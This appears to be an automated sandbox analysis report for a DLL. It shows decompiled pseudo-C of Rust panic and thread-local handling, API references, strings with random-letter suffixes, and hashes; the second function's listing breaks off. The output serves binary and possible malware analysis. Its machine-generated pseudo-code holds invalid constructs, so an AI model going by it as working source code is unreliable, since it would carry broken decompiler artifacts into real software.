Opcode ID: 828905f4c16ac5080fbcc9c442bc90a1cd6c27b6697f3adf61af297525d24005
Instruction ID: 6932a766f463d55541810f026426bc8fe7a6e826366b53d84b5e8ee57a37262e
Opcode Fuzzy Hash: 828905f4c16ac5080fbcc9c442bc90a1cd6c27b6697f3adf61af297525d24005
Instruction Fuzzy Hash: 1B1216B0601B009FE761CFB6C894B97BBF5BB4A308F10492ED59A86790D771B849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E43C8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6E443B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6e48adc0], esi");
				_t190 = E6E43D1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6E456EE0(_t264,  &M6E47D0E7, 0x46, _t337,  &_v68, 0x6e47d060, 0x6e47d1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e47cd60;
						_v120 = 0x6e47d014;
						_v68 = 0x6e47da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E432640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6E43D2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6e48adc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6e48adc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6e47da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e47cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6E43D2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6e48adbc);
					_v144 = 0x6e48adbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6E43D1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6e48adb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6E43D530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6E456EE0(_t264,  &M6E47D0E7, 0x46, _t340,  &_v68, 0x6e47d060, 0x6e47d1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6e48a044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6e48a044;
							_t202 = E6E442B10(_t264, 0x6e48a044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6e48a044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6e48a044;
								_t203 = E6E442B10(_t264, 0x6e48a044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6e48adc8; // 0x260000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6e48a044;
										_t332 = _t205;
										_t206 =  *0x6e48a044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6E442B10(_t264, 0x6e48a044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6E456C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6e48adc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6e48adb0;
											 *0x6e48adb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6e443440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6e48adc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6E43C800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6E456EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e47d050, 0x6e47d720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6E43C690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6E43C800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6e47d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e43de50;
										_v60 =  &_v100;
										_v56 = 0x6e43de50;
										_v52 =  &_v148;
										_v48 = E6E43DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E43D2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6e48adc8, 0, _t245);
											}
											HeapFree( *0x6e48adc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											"o@,w)@,w"();
											_v68 = 0x6e47d2c0;
											_v64 = 1;
											_v152 = 0x6e48adac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E43DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6E43D2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e48adac, 0x6e48adac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6E43C800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6E43DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e48adbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e47da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e47cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6E43D2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6E43D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6E43D440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6e48a040 = 0;
											_t356 =  *0x6e48a040;
											if( *0x6e48a040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6e47d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e47cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E43D2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6e48adc8, 0, _t235);
											}
											HeapFree( *0x6e48adc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

0x6e43c8cc
0x6e43c8cf
0x6e43c8d6
0x6e43c8dd
0x6e43c8e2
0x6e43c8e7
0x6e43c8f0
0x6e43c8f3
0x6e43c8f9
0x6e43c901
0x6e43c906
0x6e43c908
0x6e43c922
0x6e43c927
0x6e43c92a
0x6e43c92a
0x6e43c92e
0x6e43c931
0x6e43c934
0x6e43c936
0x6e43c9aa
0x6e43c9ad
0x6e43ca0a
0x6e43ca11
0x6e43ca1b
0x6e43ca22
0x6e43ca29
0x6e43ca2d
0x6e43ca34
0x6e43ca3b
0x6e43ca41
0x6e43ca44
0x6e43ca47
0x6e43ca4d
0x6e43ca54
0x6e43ca57
0x6e43ca5e
0x6e43ca63
0x6e43ca65
0x6e43ca6c
0x6e43ca74
0x6e43ca77
0x6e43ca79
0x6e43ca7c
0x6e43ca7c
0x6e43ca7f
0x6e43ca82
0x6e43ca86
0x6e43ca88
0x6e43ca8a
0x6e43ca8e
0x6e43ca90
0x6e43ca90
0x6e43ca9c
0x6e43ca9c
0x6e43caaa
0x6e43caaa
0x00000000
0x6e43ca65
0x6e43c9b2
0x6e43c9b5
0x6e43c9bc
0x6e43c9c3
0x6e43c9ca
0x6e43c9d1
0x6e43c9d5
0x6e43c9dc
0x6e43c9e3
0x6e43c9e8
0x6e43c9ea
0x00000000
0x6e43c9f0
0x6e43c9f5
0x6e43c9fd
0x6e43ca00
0x6e43ca02
0x00000000
0x6e43ca02
0x6e43c93d
0x6e43c93d
0x6e43c945
0x6e43c94b
0x6e43c955
0x6e43c95c
0x6e43c963
0x6e43c969
0x6e43c96c
0x6e43c96f
0x6e43c972
0x6e43c975
0x6e43c97a
0x6e43c97d
0x6e43c97f
0x6e43cab3
0x6e43cab3
0x6e43cab6
0x6e43cab8
0x6e43cb8b
0x6e43cb90
0x6e43cb93
0x6e43cb96
0x6e43cd97
0x00000000
0x6e43cd97
0x6e43cb9c
0x6e43cb9f
0x6e43cd90
0x00000000
0x6e43cd90
0x6e43cba5
0x6e43cba7
0x00000000
0x00000000
0x6e43cbb0
0x6e43cbb5
0x6e43cbb8
0x6e43cbbb
0x6e43cbbd
0x00000000
0x00000000
0x6e43cbc3
0x00000000
0x6e43cbc3
0x6e43cabe
0x00000000
0x6e43c985
0x6e43c99d
0x6e43c9a2
0x6e43cdbe
0x6e43cdbe
0x6e43cdc0
0x6e43cdc0
0x6e43cdc5
0x6e43caf3
0x6e43caf3
0x6e43caf6
0x6e43caf9
0x6e43cb00
0x6e43cb02
0x6e43cb07
0x6e43cb07
0x6e43cb0d
0x6e43cb16
0x6e43cbf3
0x6e43cbf3
0x6e43cbf8
0x6e43cbfa
0x6e43cbfc
0x6e43cc01
0x6e43cc01
0x6e43cc07
0x6e43cc0d
0x6e43cc0f
0x6e43cdcf
0x6e43cdd4
0x6e43cdd6
0x6e43cde6
0x6e43cdeb
0x6e43cdf0
0x6e43cdf2
0x6e43ce32
0x6e43ce38
0x6e43ce3f
0x6e43ce41
0x6e43ce46
0x6e43ce48
0x6e43ce4f
0x6e43ce52
0x6e43ce57
0x6e43ce57
0x6e43ce5c
0x00000000
0x6e43ce5c
0x6e43cdf4
0x6e43cdfe
0x6e43ce03
0x6e43ce05
0x6e43ce05
0x6e43ce08
0x6e43ce0b
0x6e43ce0e
0x6e43ceb8
0x6e43cebe
0x6e43cec9
0x6e43cec9
0x6e43cece
0x6e43cece
0x6e43ced0
0x6e43ced0
0x6e43ced2
0x6e43cedd
0x6e43cedd
0x6e43cee2
0x6e43cee2
0x6e43ceed
0x6e43cef5
0x6e43cef8
0x6e43cefb
0x6e43cefb
0x6e43cefb
0x6e43cac1
0x6e43cac1
0x6e43cac7
0x6e43caca
0x6e43caca
0x6e43cad0
0x6e43cad3
0x6e43cad5
0x6e43cae3
0x6e43cae3
0x6e43cae5
0x6e43cbcd
0x6e43cbd0
0x6e43cbde
0x6e43cbe0
0x00000000
0x00000000
0x6e43cbe6
0x6e43cbe9
0x6e43cbeb
0x00000000
0x6e43cbeb
0x6e43caeb
0x6e43caee
0x6e43caf0
0x00000000
0x6e43caf0
0x6e43cec0
0x6e43cec2
0x00000000
0x6e43cec2
0x6e43ce14
0x6e43ce17
0x00000000
0x00000000
0x6e43ce1d
0x6e43ce20
0x00000000
0x00000000
0x6e43ce26
0x6e43ce28
0x00000000
0x6e43ce28
0x6e43cdd8
0x6e43cddd
0x6e43cddf
0x00000000
0x00000000
0x6e43cde1
0x00000000
0x6e43cc15
0x6e43cc15
0x6e43cc17
0x6e43cc1a
0x6e43ce62
0x6e43ce62
0x6e43ce65
0x6e43ce68
0x6e43ce68
0x6e43ce6b
0x6e43ce71
0x6e43ce78
0x6e43ce7f
0x6e43ce85
0x6e43ce87
0x6e43ce8d
0x6e43ce90
0x6e43ce96
0x6e43ce96
0x6e43ce90
0x6e43ce87
0x00000000
0x6e43ce7f
0x6e43cc20
0x6e43cc27
0x6e43cc2e
0x6e43cc2e
0x00000000
0x6e43cc2e
0x6e43cb1c
0x6e43cb1f
0x6e43cb21
0x00000000
0x00000000
0x6e43cb27
0x6e43cb2a
0x6e43cb2d
0x6e43cdb6
0x6e43cdbb
0x00000000
0x6e43cdbb
0x6e43cb33
0x6e43cb39
0x6e43cb3e
0x6e43cb40
0x6e43cb43
0x6e43cb4a
0x6e43cb4f
0x6e43cb52
0x6e43cb54
0x6e43cb57
0x6e43cb59
0x6e43cb5b
0x6e43cb5e
0x6e43cb60
0x6e43cb63
0x6e43cb63
0x6e43cb5e
0x6e43cb68
0x6e43cb68
0x6e43cb6b
0x6e43cb6e
0x6e43caaf
0x6e43caaf
0x6e43cab1
0x00000000
0x6e43cb74
0x6e43cb74
0x6e43cb78
0x6e43cb7b
0x6e43cb7e
0x6e43cea0
0x6e43cea6
0x6e43cea8
0x6e43ceab
0x6e43d062
0x6e43d062
0x6e43d067
0x6e43d068
0x6e43d068
0x6e43cc30
0x6e43cc37
0x6e43cc3e
0x6e43cc45
0x6e43cc4c
0x6e43cc50
0x6e43cc57
0x6e43cc5e
0x6e43cc65
0x6e43cc6d
0x6e43cc70
0x6e43cc76
0x6e43cc79
0x6e43cc7f
0x6e43cc85
0x6e43cc8c
0x6e43cc95
0x6e43cc9c
0x6e43cca2
0x6e43cca9
0x6e43ccac
0x6e43ccba
0x6e43ccc1
0x6e43ccc9
0x6e43cccc
0x6e43ccce
0x6e43ccd1
0x6e43ccd4
0x6e43ccdb
0x6e43ccdd
0x6e43cce3
0x6e43cce5
0x6e43cce5
0x6e43ccf1
0x6e43ccf1
0x6e43ccff
0x6e43ccff
0x6e43cd04
0x6e43cd15
0x6e43cd1a
0x6e43cf0b
0x6e43cf1a
0x6e43cf21
0x6e43cf28
0x6e43cf32
0x6e43cf35
0x6e43cf3c
0x6e43cf43
0x6e43cf49
0x6e43cf50
0x6e43cf53
0x6e43cf5a
0x6e43cf5f
0x6e43cf68
0x6e43cf6e
0x6e43cf71
0x00000000
0x00000000
0x6e43cf78
0x6e43cf80
0x6e43cf83
0x6e43cf85
0x00000000
0x6e43cd20
0x6e43cd23
0x6e43cfc0
0x6e43cfc3
0x6e43cfc5
0x6e43cfc7
0x6e43cfca
0x6e43cfcf
0x6e43cfcf
0x6e43cfca
0x6e43cfd7
0x6e43cfdd
0x6e43cfe3
0x6e43cfe5
0x6e43cfe7
0x6e43cfea
0x6e43cfef
0x6e43cfef
0x6e43cfea
0x6e43cff9
0x6e43cfff
0x6e43d003
0x6e43d00a
0x6e43d012
0x6e43d019
0x6e43d020
0x6e43d027
0x6e43d02e
0x6e43d032
0x6e43d039
0x6e43d040
0x6e43d048
0x6e43d04b
0x6e43d04e
0x6e43d053
0x6e43d055
0x6e43d055
0x6e43d057
0x6e43d05b
0x6e43d060
0x00000000
0x6e43d060
0x6e43cd2b
0x6e43cd31
0x6e43cd33
0x00000000
0x00000000
0x6e43cd3c
0x6e43cd3f
0x6e43cd46
0x6e43cd4d
0x6e43cd54
0x6e43cd5b
0x6e43cd62
0x6e43cd70
0x00000000
0x00000000
0x6e43cd7b
0x6e43cd7e
0x6e43cd86
0x6e43cd88
0x6e43cf88
0x6e43cf8b
0x6e43cf92
0x6e43cf9b
0x6e43cf9d
0x6e43cf9f
0x6e43cf9f
0x6e43cfab
0x6e43cfab
0x6e43cfbb
0x00000000
0x6e43cfbb
0x6e43cd1a
0x6e43ceb1
0x00000000
0x6e43ceb1
0x6e43cb84
0x00000000
0x6e43cb84
0x6e43cb6e
0x6e43cb16
0x6e43c97f

APIs

Part of subcall function 6E43D1B0: TlsGetValue.KERNEL32 ref: 6E43D1BB
Part of subcall function 6E43D1B0: TlsGetValue.KERNEL32 ref: 6E43D1F3

AcquireSRWLockShared.KERNEL32(6E48ADBC), ref: 6E43C945
HeapFree.KERNEL32(00000000,00000000), ref: 6E43CA9C
HeapFree.KERNEL32(00000000,?), ref: 6E43CAAA
TlsGetValue.KERNEL32 ref: 6E43CB0D
TlsGetValue.KERNEL32 ref: 6E43CC07
HeapFree.KERNEL32(00000000,00000000), ref: 6E43CCF1
HeapFree.KERNEL32(00000000,?), ref: 6E43CCFF
GetProcessHeap.KERNEL32 ref: 6E43CDD8
HeapAlloc.KERNEL32(00260000,00000000,00000010), ref: 6E43CDEB
TlsSetValue.KERNEL32(00000000,00000000,00260000,00000000,00000010), ref: 6E43CE5C
HeapFree.KERNEL32(00000000,00000000,00260000), ref: 6E43CEDD

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E43CDC0
already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6E43CDA1
cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E43C90D, 6E43C988
Y3Dn, xrefs: 6E43C8C5
full, xrefs: 6E43CEB8

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Dn$already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
API String ID: 2275035175-188258983
Opcode ID: ffb4c942c0df09ecbc2b734adaa474ec0f5af0da2f91d9a08cb0621e3110bc83
Instruction ID: 4e0021d4a75faf8eb127a767bfe47758fca982f570fd06c9aac9f3fa68bccb17
Opcode Fuzzy Hash: ffb4c942c0df09ecbc2b734adaa474ec0f5af0da2f91d9a08cb0621e3110bc83
Instruction Fuzzy Hash: 05121574A002298FEB50DFF6C854B9EBBB5FF4A315F20851AD415AB380D775A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C890, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E43C890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void* _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6E443B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6e47d9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6e48adc0], esi");
				_t193 = E6E43D1B0(_t268, 0x6e47d9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6E456EE0(_t268,  &M6E47D0E7, 0x46, _t349,  &_v68, 0x6e47d060, 0x6e47d1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e47cd60;
						_v120 = 0x6e47d014;
